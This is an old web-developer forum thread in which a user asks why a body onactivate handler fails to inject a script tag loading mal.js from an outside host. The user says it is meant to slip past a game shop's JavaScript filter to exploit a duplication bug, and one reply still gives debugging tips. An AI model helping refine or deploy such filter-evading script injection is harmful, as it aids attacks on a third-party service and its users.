/    Sign up×
Community /Pin to ProfileBookmark

This isnt working and i cant figure out why

<body onactivate=”ban.innerHTML='<sc’+’ript’+’ id=test src=http://www.hacksource.net/freehosting/mal.js></’+’script>'”>

yes i have a div called ban and it is before the body tag

to post a comment
JavaScript

6 Comments(s)

Copy linkTweet thisAlerts:
@JonaJan 30.2005 — [font=trebuchet ms]You shouldn't have a DIV before the body tag. If you use valid HTML, I will help.[/font]
Copy linkTweet thisAlerts:
@StashXJan 30.2005 — check this @ http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/events/onactivate.asp

<i>
</i>&lt;HTML&gt;
&lt;HEAD&gt;
&lt;SCRIPT&gt;
function fnActivate(){
oDIV1.innerHTML += "&lt;BR&gt;&lt;BR&gt;The &lt;B&gt;onactivate&lt;/B&gt; event, available as of
Internet Explorer 5.5, fires first on the BODY element.";
}
function fnLoad(){
oDIV1.innerHTML += "&lt;BR&gt;&lt;BR&gt;The &lt;B&gt;onload&lt;/B&gt; event, available as of
Internet Explorer 4.0, fires after the &lt;i&gt;onactivate&lt;/i&gt; event fires
on the BODY element.";
}
&lt;/SCRIPT&gt;
&lt;/HEAD&gt;
&lt;BODY onactivate="fnActivate();" onload="fnLoad();"&gt;

&lt;DIV id="oDIV1"&gt;&lt;/DIV&gt;

&lt;/BODY&gt;
&lt;/HTML&gt;
Copy linkTweet thisAlerts:
@ScriptNoobie86authorJan 30.2005 — of course its not good html...

im using it for xploiting a duplication for a gameserver

in a shop, you can use html but it blocks 99% of all javascript.


this happened to not be cought the onactivate
Copy linkTweet thisAlerts:
@JonaJan 30.2005 — [i]Originally posted by ScriptNoobie86 [/i]

[B]of course its not good html...



im using it for xploiting a duplication for a gameserver



in a shop, you can use html but it blocks 99% of all javascript.


this happened to not be cought the onactivate [/B]
[/QUOTE]


[font=trebuchet ms]Exploiting a duplication for a gameserver? And, does this in any way contradict the terms of service?[/font]
Copy linkTweet thisAlerts:
@ScriptNoobie86authorJan 30.2005 — technically: no

morally: of course im going to benifit as the economy goes to crap
Copy linkTweet thisAlerts:
@JonaJan 30.2005 — [font=trebuchet ms]Try identifying the DIV through the "document.getElementById" method, or you might try "document.all."[/font]
×

Success!

Help @ScriptNoobie86 spread the word by sharing this article on Twitter...

Tweet This
Sign in
Forgot password?
Sign in with TwitchSign in with GithubCreate Account
about: ({
version: 0.1.9 BETA 5.18,
whats_new: community page,
up_next: more Davinci•003 tasks,
coming_soon: events calendar,
social: @webDeveloperHQ
});

legal: ({
terms: of use,
privacy: policy
});
changelog: (
version: 0.1.9,
notes: added community page

version: 0.1.8,
notes: added Davinci•003

version: 0.1.7,
notes: upvote answers to bounties

version: 0.1.6,
notes: article editor refresh
)...
recent_tips: (
tipper: @AriseFacilitySolutions09,
tipped: article
amount: 1000 SATS,

tipper: @Yussuf4331,
tipped: article
amount: 1000 SATS,

tipper: @darkwebsites540,
tipped: article
amount: 10 SATS,
)...